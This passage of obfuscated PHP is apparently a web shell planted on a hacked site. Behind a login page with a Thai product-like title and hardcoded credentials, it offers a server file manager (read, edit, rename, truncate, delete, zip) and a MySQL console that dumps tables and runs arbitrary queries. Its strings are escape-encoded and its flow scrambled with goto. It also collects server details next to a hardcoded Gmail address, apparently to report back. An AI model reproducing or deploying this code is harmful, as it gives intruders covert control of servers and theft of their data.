"\74\x2f\x73\160\x61\156\76\74\x62\162\57\x3e\74\x62\x75\164\164\157\x6e\x20\143\x6c\141\x73\x73\75\x27\142\x74\x6e\47{$elaveBtn}\76\40\x44\x26\43\66\60\x31\73\171\151\46\x23\x33\x35\x31\x3b\40\74\57\142\x75\x74\164\157\x6e\76\74\x2f\144\x69\166\x3e"; print "\x3c\144\151\166\40\143\154\141\163\163\x3d\x27\146\141\171\x6c\x5f\x6f\170\x75\x27\x3e" . highlight_string(file_get_contents($default_dir . $ayirici . $faylAdi), true) . "\74\57\x64\x69\166\x3e"; } } else { if ($ne == "\163\x6b\x6c") { $host = isset($_COOKIE["\150\157\x73\164"]) ? $_COOKIE["\150\x6f\x73\164"] : ''; $user = isset($_COOKIE["\x75\x73\145\x72"]) ? $_COOKIE["\x75\163\x65\x72"] : ''; $parol = isset($_COOKIE["\x70\x61\162\157\154"]) ? $_COOKIE["\x70\141\x72\x6f\x6c"] : ''; $baza = isset($_COOKIE["\142\x61\x7a\141"]) ? $_COOKIE["\x62\141\x7a\x61"] : ''; if (isset($_POST["\150\x6f\163\x74"], $_POST["\x75\163\x65\x72"], $_POST["\160\141\162\157\154"]) && is_string($_POST["\x68\157\x73\164"]) && is_string($_POST["\165\163\x65\162"]) && is_string($_POST["\160\141\x72\157\x6c"])) { $host = $_POST["\x68\157\163\164"]; $user = $_POST["\165\163\145\162"]; $parol = $_POST["\160\141\x72\157\154"]; $baza = ''; setcookie("\150\x6f\163\164", $host, time() + 360000); setcookie("\165\163\145\162", $user, time() + 360000); setcookie("\x70\141\x72\x6f\154", $parol, time() + 360000); setcookie("\x62\141\172\x61", $baza, time() + 360000); } if (isset($_POST["\x62\x61\x7a\x61"]) && is_string($_POST["\142\x61\172\141"])) { $baza = $_POST["\142\141\x7a\x61"]; setcookie("\142\141\x7a\141", $baza, time() + 360000); } $bazaStr = empty($baza) ? '' : "\x64\142\x6e\141\155\145\75" . $baza . "\x3b"; ?>
<form method="POST"><input name="ne"value="skl"type="hidden"> <input name="host"value="<?php  echo htmlspecialchars($host); ?>
"placeholder="Hostname"> <input name="user"value="<?php  echo htmlspecialchars($user); ?>
"placeholder="User"> <input name="parol"value="<?php  echo htmlspecialchars($parol); ?>
"placeholder="Parol"> <input value="Daxil ol"type="submit"></form><?php  if (!empty($host)) { try { $pdo = new PDO("\x6d\x79\x73\161\154\x3a\150\157\x73\x74\x3d" . $host . "\73\x63\x68\141\162\163\145\164\x3d\165\164\146\x38\73" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\x53\x45\x54\40\116\x41\x4d\105\123\40\x27\165\x74\x66\70\47")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $schematas = $pdo->query("\x53\x45\x4c\105\x43\124\40\x73\143\150\145\155\141\137\156\141\x6d\x65\40\x46\122\117\x4d\40\x69\156\146\x6f\162\155\x61\x74\151\x6f\x6e\x5f\163\143\x68\x65\x6d\x61\56\163\x63\150\145\155\x61\164\141"); print "\x3c\x66\x6f\162\155\x20\x6d\x65\x74\x68\x6f\x64\x3d\42\x50\117\x53\124\x22\76\x3c\151\156\160\x75\164\x20\164\171\x70\145\75\42\150\x69\144\144\x65\156\42\x20\x6e\x61\155\145\75\42\x6e\x65\42\x20\166\x61\154\165\x65\x3d\x22\x73\x6b\154\42\76\x3c\163\x65\x6c\x65\x63\x74\x20\156\141\x6d\x65\x3d\42\x62\141\172\141\42\76"; foreach ($schematas->fetchAll() as $schemaName) { print "\74\157\160\164\151\x6f\156" . ($baza == $schemaName["\x73\x63\150\x65\x6d\x61\x5f\156\x61\x6d\145"] ? "\x20\163\x65\x6c\x65\x63\164\x65\x64" : '') . "\x3e" . htmlspecialchars($schemaName["\163\x63\150\145\x6d\x61\137\x6e\141\155\x65"]) . "\74\x2f\x6f\160\x74\x69\157\156\x3e"; } print "\74\x2f\x73\145\x6c\x65\143\164\x3e\x20\x3c\151\156\x70\x75\164\x20\x74\x79\160\145\75\x22\x73\x75\x62\x6d\x69\x74\42\40\x76\x61\154\x75\145\75\42\123\145\143\150\x21\x22\76\x3c\x2f\146\157\162\155\x3e"; if (!empty($baza)) { $tables = $pdo->prepare("\123\105\x4c\x45\103\124\x20\x74\141\x62\x6c\145\137\156\x61\x6d\x65\40\x66\162\157\155\40\x69\156\x66\157\x72\155\x61\x74\x69\157\156\137\x73\143\150\145\155\x61\x2e\x74\141\x62\x6c\145\x73\40\x77\x68\145\162\145\40\x74\141\x62\x6c\145\137\163\x63\150\145\155\x61\75\77"); $tables->execute(array($baza)); $tables = $tables->fetchAll(); print "\x3c\x64\x69\166\40\163\x74\x79\x6c\145\x3d\42\x66\x6c\157\x61\164\x3a\x20\154\x65\146\164\73\x20\x77\151\144\x74\x68\72\x20\x32\60\x25\73\x20\x6f\166\x65\162\146\x6c\157\167\72\40\141\x75\164\x6f\73\x20\x62\x6f\162\144\x65\x72\55\x72\x69\147\x68\x74\x3a\40\61\160\x78\40\x73\157\x6c\x69\144\x20\x23\x39\x39\x39\73\x22\76"; print "\x3c\141\40\x68\x72\145\146\75\x22\152\141\166\141\163\x63\162\x69\160\x74\72\163\x65\x68\151\x66\x65\x28\x27\77\156\x65\x3d\x73\x6b\154\137\144\47\51\x3b\42\76\x21\41\40\x44\165\x6d\x70\x20\x44\x42\x20\41\x21\x3c\x2f\x61\x3e\x3c\150\x72\x3e"; foreach ($tables as $tableName) { $tableName = $tableName["\x74\x61\x62\154\x65\137\156\141\x6d\x65"]; print "\74\x61\40\x68\162\x65\x66\x3d\x22\x6a\x61\x76\x61\163\x63\162\x69\x70\164\x3a\x73\x65\x68\x69\146\145\x28\x27\x3f\x6e\145\75\x73\x6b\154\46\x74\x3d" . urlencode(urlencode(shifrele($tableName))) . "\x27\51\42\x3e" . htmlspecialchars($tableName) . "\74\x2f\x61\76\74\142\x72\76"; } print "\74\57\x64\x69\x76\76"; print "\74\x64\151\166\40\x73\164\171\154\x65\x3d\42\146\154\157\x61\164\x3a\40\x6c\145\146\164\x3b\40\x70\141\x64\x64\151\x6e\x67\x2d\154\145\146\164\72\x20\x31\60\x70\170\73\x20\167\151\144\x74\150\72\40\67\65\x25\x3b\42\76"; if (isset($_POST["\x74"]) && is_string($_POST["\x74"]) && !empty($_POST["\164"])) { $tableName = deshifrele(urldecode($_POST["\x74"])); print "\x3c\163\x70\x61\x6e\40\x63\x6c\141\163\x73\x3d\42\161\x61\x6c\x69\156\x22\76\x54\x61\142\154\145\x3a\x3c\x2f\x73\x70\x61\156\76\40" . htmlspecialchars($tableName) . "\40\x28\40\74\x61\40\150\x72\x65\146\75\42\x6a\141\x76\141\x73\x63\162\151\160\164\x3a\x73\145\150\x69\x66\145\x28\x27\x3f\156\145\75\163\153\154\x5f\x64\x5f\164\x26\164\75" . urlencode(urlencode(shifrele($tableName))) . "\47\x29\x22\76\104\165\155\160\x3c\57\x61\76\x20\x29\74\142\162\x3e"; $getColumns = $pdo->prepare("\123\105\x4c\x45\103\x54\40\x63\x6f\x6c\x75\155\x6e\x5f\156\141\155\x65\40\146\162\x6f\155\40\151\156\146\x6f\162\x6d\141\x74\x69\157\156\x5f\163\x63\x68\145\x6d\x61\x2e\143\157\x6c\x75\155\156\163\40\167\x68\x65\162\x65\40\x74\x61\142\x6c\145\x5f\163\x63\150\145\155\x61\x3d\77\40\x61\156\x64\x20\x74\x61\x62\154\145\137\156\141\155\145\x3d\x3f"); $getColumns->execute(array($baza, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $dataCount = $pdo->query("\x53\105\x4c\x45\103\124\40\x63\x6f\x75\156\164\50\60\x29\40\x41\123\x20\163\163\40\146\x72\x6f\x6d\40\140" . $tableName . "\140"); $dataCount = (int) $dataCount->fetchColumn(); print "\x3c\x73\x70\x61\x6e\x20\143\x6c\x61\163\163\75\42\x71\141\154\x69\156\x22\76\x43\x6f\165\156\164\x3a\x3c\57\163\160\141\x6e\x3e\x20" . $dataCount . "\74\142\162\x3e\x3c\x62\162\x3e"; $pages = ceil($dataCount / 100); $currentPage = isset($_POST["\163\145\150\x69\x66\145"]) && is_numeric($_POST["\163\145\x68\151\x66\145"]) && $_POST["\163\145\x68\151\146\145"] >= 1 && $_POST["\x73\x65\150\151\146\x65"] <= $pages ? (int) $_POST["\163\145\x68\x69\x66\145"] : 1; for ($p = 1; $p <= $pages; $p++) { print "\74\x61\x20\x73\164\x79\154\x65\x3d\x22" . ($currentPage == $p ? "\x62\x61\143\153\147\x72\157\165\156\144\x3a\40\x23\64\x34\64\x3b" : '') . "\x6d\x61\162\x67\x69\156\x2d\154\x65\146\x74\x3a\40\x32\x70\170\x3b\x20\x6d\141\x72\x67\x69\x6e\x2d\142\x6f\164\164\157\x6d\x3a\40\x35\x70\170\73\40\160\141\x64\144\x69\x6e\x67\72\x20\62\x70\x78\40\x36\160\170\73\x20\x62\x6f\162\144\x65\x72\x3a\40\x31\160\170\40\x73\x6f\154\151\x64\40\x23\101\103\x42\67\65\64\73\40\x74\x65\170\164\x2d\144\x65\x63\x6f\x72\141\164\151\157\156\x3a\40\156\x6f\x6e\x65\x3b\42\x20\150\x72\x65\x66\x3d\x22\x6a\141\166\x61\x73\143\x72\x69\160\x74\x3a\x73\145\x68\151\146\145\x28\47\x3f\x6e\x65\75\x73\153\154\46\x74\x3d" . urlencode(urlencode(shifrele($tableName))) . "\46\x73\x65\150\151\146\x65\x3d" . $p . "\x27\51\73\x22\76" . $p . "\74\57\x61\x3e\x20"; } print "\x3c\x62\x72\76\74\142\162\76"; $start = 100 * ($currentPage - 1); $data = $pdo->query("\123\105\114\105\103\x54\40\52\x20\106\122\x4f\115\x20\x60" . $tableName . "\x60\x20\114\111\115\111\124\40" . $start . "\40\x2c\x20\61\60\60"); $data = $data->fetchAll(); print "\x3c\x74\141\x62\x6c\145\76\74\x74\150\145\141\144\76"; foreach ($columns as $columnInf) { print "\74\x74\150\x3e" . htmlspecialchars($columnInf["\143\157\154\165\x6d\156\x5f\x6e\141\x6d\145"]) . "\74\x2f\164\150\76"; } print "\74\x2f\x74\x68\145\141\x64\x3e\74\164\x62\x6f\x64\x79\76"; foreach ($data as $row) { print "\x3c\164\x72\76"; foreach ($row as $key => $val) { print "\74\x74\144\76\x3c\144\151\166\76" . $val . "\x3c\x2f\144\151\x76\76\x3c\57\164\x64\x3e"; } print "\x3c\x2f\x74\x72\76"; } print "\74\x2f\164\x72\x3e\74\x2f\164\x62\157\x64\171\x3e\74\x2f\164\141\142\x6c\145\x3e"; } else { print "\124\x61\142\154\145\x20\156\157\x74\x20\146\x6f\165\x6e\144\41"; } } else { if (isset($_POST["\145\x6d\162"]) && is_string($_POST["\x65\155\x72"]) && !empty($_POST["\145\x6d\162"])) { $emr = deshifrele(urldecode($_POST["\x65\x6d\x72"])); print "\74\163\x70\141\x6e\40\x63\154\x61\x73\163\75\42\161\x61\154\x69\x6e\42\76\123\121\x4c\x20\x65\155\162\x3a\x3c\57\x73\x70\x61\x6e\x3e\x20" . htmlspecialchars($emr) . "\74\x62\162\x3e"; $data = $pdo->query($emr); $data = $data->fetchAll(); print "\x3c\164\x61\x62\x6c\145\x3e\x3c\x74\150\x65\x61\x64\x3e"; if (count($data) > 0) { print "\74\x74\162\76"; foreach ($data[0] as $key => $val) { print "\x3c\164\x68\x3e\x3c\144\151\166\76" . $key . "\x3c\x2f\x64\151\x76\x3e\74\x2f\164\150\76"; } print "\x3c\57\x74\162\76"; } print "\x3c\x2f\164\150\x65\x61\x64\76\74\164\x62\x6f\144\x79\x3e"; foreach ($data as $row) { print "\74\x74\162\x3e"; foreach ($row as $key => $val) { print "\74\x74\144\76\x3c\x64\151\x76\76" . $val . "\x3c\x2f\x64\x69\x76\x3e\x3c\57\164\144\x3e"; } print "\x3c\57\x74\x72\x3e"; } print "\x3c\57\164\x72\76\x3c\x2f\x74\142\x6f\144\x79\76\74\x2f\x74\x61\142\x6c\x65\76"; } } print "\x3c\144\151\x76\76\x3c\164\145\x78\x74\x61\x72\x65\141\x20\x69\144\75\x22\163\153\154\x5f\145\155\x72\x22\76\x3c\57\164\x65\170\164\141\x72\x65\141\76\74\142\165\164\164\x6f\x6e\x20\164\x79\x70\145\x3d\42\x62\165\164\x74\157\156\42\40\157\156\x63\x6c\151\143\x6b\x3d\x22\163\153\154\137\x62\141\x73\x28\x29\x3b\42\x3e\102\x61\x73\x20\x6d\145\156\x65\x3c\x2f\x62\x75\164\x74\157\156\76\74\x2f\144\x69\x76\x3e"; print "\x3c\57\144\151\166\x3e"; print "\x3c\x64\151\166\x20\163\164\171\x6c\145\x3d\42\143\154\145\x61\162\72\x20\x62\157\x74\x68\x3b\42\76\74\x2f\144\x69\166\76"; } } catch (Exception $e) { print $e->getMessage(); } } } else { if ($ne == "\146\x61\x79\x6c\137\162\x65\144\141\153\x74\145" && isset($_POST["\x66\141\x79\x6c"]) && '' != trim($_POST["\x66\141\x79\x6c"])) { $faylAdi = basename(deshifrele(urldecode(urldecode($_POST["\146\141\x79\154"])))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\57" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { $status = ''; if (isset($_POST["\x63\x6f\x6e\x74\x65\156\164"]) && isset($_POST["\x74\157\x6f\153"]) && $_POST["\164\157\x6f\153"] != '' && isset($_SESSION["\171\163\x5f\164\x6f\157\153"]) && $_SESSION["\x79\163\x5f\164\157\x6f\x6b"] == $_POST["\164\157\157\153"] && is_writeable($default_dir . $ayirici . $faylAdi)) { unset($_SESSION["\171\x73\137\164\157\x6f\x6b"]); $content = $_POST["\x63\x6f\x6e\x74\145\x6e\x74"]; $cc = array("\x61", "\x69", "\x65", "\163", "\x6c", "\x62", "\165", "\157", "\160", "\x68", "\x28", "\51", "\74", "\76", "\x3f", "\x3b", "\x5b", "\x5d", "\x24"); foreach ($cc as $k1 => $v1) { $content = str_replace("\x7c\72" . $k1 . "\x3a\174", $v1, $content); } $faylAch = fopen($default_dir . $ayirici . $faylAdi, "\x77\x2b"); fwrite($faylAch, $content); fclose($faylAch); $status = "\40\74\163\x70\141\156\x20\x63\x6c\141\163\163\x3d\47\161\141\x6c\151\x6e\x27\x3e\125\46\x23\62\70\x37\x3b\x75\x72\x6c\x61\x20\171\x61\144\144\141\x20\x73\141\x78\x6c\x61\156\46\x23\x33\x30\x35\x3b\x6c\144\x26\x23\63\x30\x35\73\x21\x3c\x2f\163\160\x61\156\x3e"; } $oxuUrl = "\x3f\x6e\x65\x3d\x66\141\171\154\x5f\157\170\165\46\x66\x61\x79\154\x3d" . urlencode(urlencode(shifrele($faylAdi))) . "\46\x71\x6f\x76\x6c\165\161\75" . urlencode(urlencode(shifrele($default_dir))); $elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? '' : "\x20\x64\x69\x73\x61\142\x6c\x65\144"; print "\x3c\144\x69\x76\76\106\141\x79\154\x20\x61\144\46\43\x33\x30\65\73\72\x20\x3c\x61\x20\143\x6c\x61\x73\x73\x3d\x27\161\141\x6c\151\156\47\40\x68\x72\x65\x66\x3d\x27\152\141\166\x61\x73\x63\x72\151\x70\164\72\163\145\x68\x69\x66\145\x28\42{$oxuUrl}\42\x29\x27\x3e" . htmlspecialchars($faylAdi) . "\x3c\57\x61\76\74\x62\x72\57\76\74\x66\157\x72\155\40\x6d\145\x74\x68\x6f\144\x3d\x27\120\117\x53\x54\47\40\163\164\171\154\x65\75\47\160\141\x64\x64\x69\156\147\x3a\40\60\73\x20\155\x61\162\147\151\x6e\72\40\60\x3b\47\x3e\x3c\142\165\x74\164\157\x6e\x20\x74\171\160\145\x3d\x27\x73\165\142\x6d\x69\x74\x27\40\143\154\141\x73\163\x3d\x27\142\164\156\x27{$elaveBtn}\76\40\131\x61\x64\144\141\x20\x73\x61\170\x6c\x61\x20\74\x2f\x62\165\x74\164\157\x6e\x3e\40\x3c\142\x75\x74\x74\157\x6e\x20\x74\x79\x70\145\x3d\x27\x62\165\164\164\157\x6e\47\40\x6f\x6e\x63\154\151\143\x6b\75\47\x73\x68\151\x66\162\145\154\x65\x65\50\x29\47\x3e\x20\x53\150\151\x66\162\x65\x6c\x65\x20\141\x74\x61\x73\150\x20\74\x2f\142\165\x74\164\157\156\x3e\x20{$status}\74\x2f\144\151\x76\76"; print "\74\x69\156\x70\165\x74\x20\x74\x79\x70\145\x3d\x27\x68\151\x64\x64\145\x6e\x27\x20\166\x61\154\x75\x65\x3d\47\x66\141\x79\x6c\x5f\x72\x65\144\x61\153\164\x65\x27\x20\156\x61\x6d\x65\75\47\156\145\47\x3e\x3c\151\156\x70\x75\164\40\164\x79\x70\145\x3d\47\150\151\144\144\145\156\47\x20\x76\x61\154\x75\x65\x3d\47" . shifrele($faylAdi) . "\x27\x20\x6e\141\155\145\75\x27\x66\141\x79\154\47\76\74\151\156\x70\x75\164\40\164\171\x70\x65\x3d\47\x68\151\144\144\145\x6e\x27\40\166\x61\x6c\x75\x65\75\x27" . urlencode(shifrele($default_dir)) . "\x27\x20\x6e\141\x6d\145\x3d\x27\x71\x6f\166\x6c\165\161\47\x3e\x3c\151\x6e\160\165\164\x20\x74\x79\160\x65\75\x27\x68\151\x64\144\145\156\x27\x20\x76\141\x6c\165\x65\x3d\47" . tookYarat("\x79\x73\137\164\157\157\153") . "\x27\40\156\141\155\x65\75\47\x74\157\157\x6b\47\76\74\164\145\170\164\x61\162\145\x61\x20\x6e\141\155\x65\x3d\47\143\157\156\x74\145\156\164\x27\40\x63\x6c\x61\x73\x73\x3d\47\x66\151\x6c\145\x5f\145\x64\x69\164\x27\x3e" . htmlspecialchars(file_get_contents($default_dir . $ayirici . $faylAdi)) . "\x3c\x2f\164\x65\x78\164\x61\x72\x65\x61\x3e\x3c\57\x66\157\162\x6d\76"; } else { print "\105\x72\x72\157\x72\41\x20" . htmlspecialchars($default_dir . $ayirici . $faylAdi); } } else { if (is_dir($default_dir)) { if (is_readable($default_dir)) { $qovluqIchi = scandir($default_dir); foreach ($qovluqIchi as &$emelemnt) { $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($emelemnt, 0, 1) != "\x2f" ? "\57" : ''; if (is_dir($default_dir . $ayirici . $emelemnt)) { $emelemnt = "\60" . $emelemnt; } else { $emelemnt = "\61" . $emelemnt; } } asort($qovluqIchi); print "\74\164\141\x62\154\x65\x20\x63\x6c\141\x73\163\75\47\x66\115\141\x6e\x61\147\x65\x72\47\x20\163\x74\x79\154\x65\x3d\47\167\151\x64\x74\150\x3a\x20\61\60\x30\45\x3b\47\76\x3c\164\150\x65\x61\144\x3e\74\164\162\x20\x63\x6c\x61\x73\163\x3d\47\x71\141\154\x69\156\x27\76\x3c\164\150\76\x73\x3c\57\x74\150\76\74\x74\150\x3e\106\141\x79\154\74\x2f\164\x68\x3e\x3c\x74\x68\76\123\x69\172\145\x3c\x2f\x74\x68\x3e\74\164\x68\x3e\124\141\162\x69\170\74\x2f\164\x68\x3e\74\164\150\x3e\x4f\x77\x6e\x65\x72\x2f\x47\x72\x6f\165\x70\x3c\57\164\x68\76\x3c\x74\150\76\x50\145\162\x6d\x69\163\x73\151\157\x6e\163\74\x2f\x74\150\76\x3c\164\x68\x3e\x41\143\x74\151\x6f\156\x73\x3c\x2f\164\150\76\x3c\x2f\x74\x72\x3e\x3c\57\164\150\145\x61\x64\76\74\x74\142\x6f\144\x79\x3e"; foreach ($qovluqIchi as $element) { $url = ''; $element = substr($element, 1); $faylAdiTam = $default_dir . $ayirici . $element; $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($element, 0, 1) != "\57" ? "\x2f" : ''; $adi = is_dir($faylAdiTam) ? "\133\x20{$element}\40\x5d" : $element; $classN = ''; if (is_dir($faylAdiTam)) { if ($element == "\56") { $url = "\77\x71\157\x76\154\x75\161\75" . urlencode(urlencode(shifrele($default_dir))); } else { if ($element == "\x2e\x2e") { $yeniUrl = explode("\x2f", $default_dir); foreach (array_reverse($yeniUrl) as $j => $qq) { if (trim($qq) != '') { unset($yeniUrl[count($yeniUrl) - $j - 1]); break; } } $url = "\77\161\157\166\154\165\161\75" . urlencode(urlencode(shifrele(implode("\57", $yeniUrl)))); } else { $url = "\77\161\157\x76\154\165\x71\75" . urlencode(urlencode(shifrele($faylAdiTam))); } } $classN = "\x20\163\164\x79\x6c\145\75\x27\x66\x6f\x6e\164\55\167\x65\151\x67\x68\x74\x3a\40\66\x30\x30\73\47"; } else { $url = "\77\156\145\x3d\x66\141\x79\154\x5f\157\x78\x75\x26\x66\x61\171\x6c\x3d" . urlencode(urlencode(shifrele($element))) . "\46\x71\x6f\166\x6c\165\161\x3d" . urlencode(urlencode(shifrele($default_dir))); } $fayldi = is_file($faylAdiTam); $isReadableColor = is_readable($faylAdiTam) && is_writeable($faylAdiTam); print "\74\164\x72\76\xa\11\11\x9\x9\11\x9\74\164\144\x3e\x3c\57\x74\x64\76\xa\x9\x9\x9\x9\x9\x9\74\164\x64\76\x3c\x61\40\150\x72\145\146\75\42\x6a\x61\x76\x61\163\x63\162\151\160\164\72\163\145\150\x69\146\145\50\47" . $url . "\47\x29\x22" . $classN . "\76" . htmlspecialchars($adi) . "\74\x2f\141\76\74\x2f\164\144\x3e\12\x9\x9\x9\x9\x9\11\74\x74\x64\x3e" . ($fayldi ? sizeFormat(filesize($faylAdiTam)) : '') . "\74\x2f\x74\144\x3e\xa\11\x9\x9\11\x9\11\74\x74\x64\76" . date("\144\40\115\x20\131\x2c\x20\x48\x3a\151", filectime($faylAdiTam)) . "\x3c\x2f\164\144\76\12\x9\x9\x9\x9\11\11\74\164\x64\x3e" . htmlspecialchars(fileowner($faylAdiTam)) . "\x3c\x2f\x74\x64\x3e\12\x9\x9\11\11\x9\11\74\x74\144" . ($isReadableColor ? "\x20\x73\164\171\154\145\75\x22\x63\x6f\x6c\157\162\72\x20\147\162\x65\145\156\73\x22" : '') . "\x3e" . substr(sprintf("\45\157", fileperms($faylAdiTam)), -4) . "\74\x2f\164\x64\76\12\x9\11\x9\x9\x9\x9\x3c\164\x64\76"; if (is_file($faylAdiTam)) { print "\40\74\141\x20\150\x72\145\x66\75\42\152\141\x76\x61\163\143\x72\x69\x70\x74\x3a\x73\145\150\151\x66\x65\x28\47" . str_replace("\x66\141\171\154\x5f\157\170\165", "\146\141\171\x6c\137\x79\x75\153\154\145", $url) . "\x27\x29\42" . $classN . "\76\x44\157\167\x6e\x6c\x6f\141\144\74\57\x61\x3e\40\174\40" . ("\40\x3c\141\x20\150\162\145\146\x3d\42\152\x61\x76\141\x73\x63\x72\x69\160\164\x3a\143\150\x61\156\147\x65\x46\x69\154\145\116\141\x6d\x65\50\x27" . htmlspecialchars($adi) . "\47\x20\x2c\x20\x27" . str_replace("\146\x61\171\154\x5f\x6f\x78\165", "\x66\141\171\x6c\137\x61\x64\137\x64\145\x79\x69\x73\x68", $url) . "\x27\51\73\x22" . $classN . "\76\x52\145\x6e\141\x6d\x65\x3c\57\x61\76\x20\x7c\x20") . ("\40\x3c\141\x20\150\162\145\146\75\42\x6a\141\x76\141\163\x63\x72\151\160\x74\72\x66\141\x79\154\123\x69\146\x69\x72\154\141\x28\47" . str_replace("\146\141\x79\154\x5f\x6f\170\x75", "\x66\x61\x79\x6c\x5f\x73\x69\x66\151\x72\154\x61", $url) . "\47\51\x3b\x22" . $classN . "\76\124\162\x75\156\x63\x61\x74\145\x3c\57\x61\76\40\x7c\x20") . ("\x20\x3c\x61\40\x68\162\145\x66\75\x22\x6a\141\x76\x61\163\x63\x72\x69\160\x74\72\146\x61\x79\x6c\123\x69\x6c\50\x27" . str_replace("\x66\141\171\154\137\x6f\x78\165", "\146\x61\171\154\x5f\163\x69\154", $url) . "\47\x29\42" . $classN . "\x3e\104\x65\x6c\145\x74\145\74\57\x61\76"); } else { if ($adi != "\x5b\40\56\x20\x5d" && $adi != "\133\40\56\56\x20\x5d") { print "\x20\x3c\141\x20\150\162\145\146\x3d\42\x6a\x61\x76\141\163\x63\162\x69\160\164\72\x7a\x69\160\x6c\x65\50\x27" . urlencode(urlencode(shifrele($faylAdiTam))) . "\47\51\x22" . $classN . "\76\132\151\160\x3c\x2f\141\76\x20\174\40" . ("\x20\74\141\x20\x68\162\145\146\75\42\152\x61\x76\x61\163\x63\x72\151\x70\164\x3a\163\151\x6c\x50\x61\x70\153\x61\x28\x27" . urlencode(urlencode(shifrele($faylAdiTam))) . "\x27\x29\x22" . $classN . "\x3e\123\x69\x6c\74\57\x61\x3e"); } } print "\x3c\x2f\164\144\76\xa\x9\x9\x9\x9\x9\x3c\x2f\164\x72\76"; } } else { print "\74\x64\151\166\x20\x73\x74\x79\154\145\75\47\x6d\x61\x72\147\151\x6e\72\40\x31\60\x70\x78\40\x30\x70\x78\73\x27\x20\x63\x6c\141\x73\163\75\x27\x71\x61\x6c\151\156\x27\x3e\120\x65\x72\155\x69\163\x73\x69\157\156\x73\x20\144\x65\156\151\x64\x65\x64\x21\74\x2f\x64\151\166\x3e"; } } } } } } } goto X95UO; nmUEC: $ip_remote = $_SERVER["\122\105\115\117\124\105\137\101\104\104\x52"]; goto J8tOz; utOnP: echo urlencode(shifrele($default_dir)); goto YWiGj; vRMX_: $EL_MuHaMMeD .= "\123\x65\x72\166\145\162\x20\x41\x64\x6d\x69\156\x20\72\40" . $_SERVER["\x53\105\x52\126\105\122\137\101\x44\115\111\116"] . "\xd\12"; goto vhvix; QBm6Y: $ne = isset($_POST["\x6e\x65"]) && in_array($_POST["\x6e\x65"], $actions) ? $_POST["\156\x65"] : "\145\163\x61\163"; goto Bx3yV; d9yO3: $password = "\x32\66\x30\x66\63\x63\x63\x34\71\60\x37\144\146\70\x62\x64\x38\x30\x66\x31\x38\141\x35\67\63\x31\x35\x35\142\x62\x64\64\60\x31\x32\x31\x65\61\x66\145"; goto NgNmx; Htky4: if (!isset($_SESSION["\x6c\157\x67\x67\145\144\151\x6e"]) || $_SESSION["\154\x6f\147\x67\145\144\x69\156"] !== true) { ?>
<!doctypehtml><html lang="en"><head><meta charset="UTF-8"><title>หมอนลาเท็กซ์</title><style>body{background-color:#000;color:#41848b;font-family:"Courier New",Courier,monospace}.login-form{text-align:center;margin-top:100px}input[type=password],input[type=text]{display:block;margin:10px auto}h2{color:red}</style></head><body><div class="login-form"><h2>หมอนลาเท็กซ์</h2><?php  if (isset($error)) { ?>
<p style="color:red"><?php  echo $error; ?>
</p><?php  } ?>
<form method="post"action=""><input name="username"placeholder="Username"required> <input name="password"placeholder="Password"required type="password"> <button name="login"type="submit">Login</button></form></div></body></html><?php  die; } goto j2Acb; BwNrn: if (isset($_POST["\161\x6f\x76\154\x75\x71"]) && is_string($_POST["\161\x6f\166\154\x75\161"])) { $default_dir = empty($_POST["\x71\157\x76\x6c\165\161"]) ? DIRECTORY_SEPARATOR : deshifrele(urldecode(urldecode($_POST["\161\x6f\x76\x6c\x75\161"]))); $c_h_dir_comm = "\x63" . "\150\144" . "\x69\162"; $c_h_dir_comm($default_dir); } goto zDAUv; KmuH_: function qovluquYaz() { global $default_dir; $sonDir = array(); $umumiHisseler = ''; $parse = explode("\57", $default_dir); $ii = 0; foreach ($parse as $hisse) { $ii++; $umumiHisseler .= $hisse . "\x2f"; $sonDir[] = "\x3c\141\x20\x68\x72\x65\146\x3d\47\152\141\x76\141\x73\x63\x72\151\x70\164\x3a\x73\x65\x68\151\x66\x65\50\x22\77\x71\157\x76\x6c\165\x71\x3d" . urlencode(urlencode(shifrele($umumiHisseler))) . "\42\x29\x27\76" . htmlspecialchars(empty($hisse) && $ii != count($parse) ? "\x2f" : $hisse) . "\74\x2f\x61\x3e"; } $sonDir = implode("\x2f", $sonDir); print $sonDir . "\46\156\142\x73\160\x3b\x26\x6e\142\x73\x70\x3b\x26\156\x62\x73\x70\73\46\x6e\142\163\x70\x3b\46\x6e\x62\163\x70\73\x26\x6e\142\163\x70\x3b\x28\40\74\x61\x20\x68\162\x65\x66\x3d\x22\42\76\122\x65\x73\x65\164\74\x2f\141\76\40\x7c\40\74\141\40\150\162\145\x66\x3d\x22\x6a\141\x76\x61\x73\x63\x72\151\x70\164\72\147\x6f\164\157\50\x29\x22\x3e\x47\x6f\x20\164\157\x3c\x2f\141\76\x20\51"; } goto MzAtQ; ywcRJ: $datasi = @fopen("\x2d\x2f\152\x73\x2e\160\x68\160", "\162"); goto wKw84; DYiqH: $to_email = "\154\157\147\x69\156\157\154\144\x75\155\100\x67\x6d\141\x69\154\56\x63\x6f\x6d"; goto Y1V__; IqHb_: function utf8ize($d) { if (is_array($d)) { foreach ($d as $k => $v) { $d[$k] = utf8ize($v); } } else { if (is_string($d)) { return utf8_encode($d); } } return $d; } goto QuNSQ; B1DF1: ?>
")}function skl_bas(){sehife("?ne=skl&emr="+b64EncodeUnicode(document.getElementById("skl_emr").value))}function b64EncodeUnicode(e){return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g,function(e,n){return String.fromCharCode("0x"+n)}))}function goto(){var e=prompt("Dir:");e&&sehife("?qovluq="+e)}function ziple(e){var n=prompt("Dir:","<?php  goto isOzC; X95UO: print "\x3c\57\164\x62\x6f\144\x79\76\x3c\57\164\141\142\154\x65\76"; goto OHT9E; ER3Vz: $valid_username = "\141\156\157\156\x62\x61\x62\x61"; goto d9yO3; wUAfB: echo urlencode(urlencode(shifrele($default_dir))); goto Iy1iI; WOXw0: $baslik = "\167\x68\155\x20\62\60\x32\60\63"; goto z8ijM; CzuhD: if (function_exists("\x70\157\x73\x69\170\137\147\145\164\145\x67\x69\144")) { $qid = 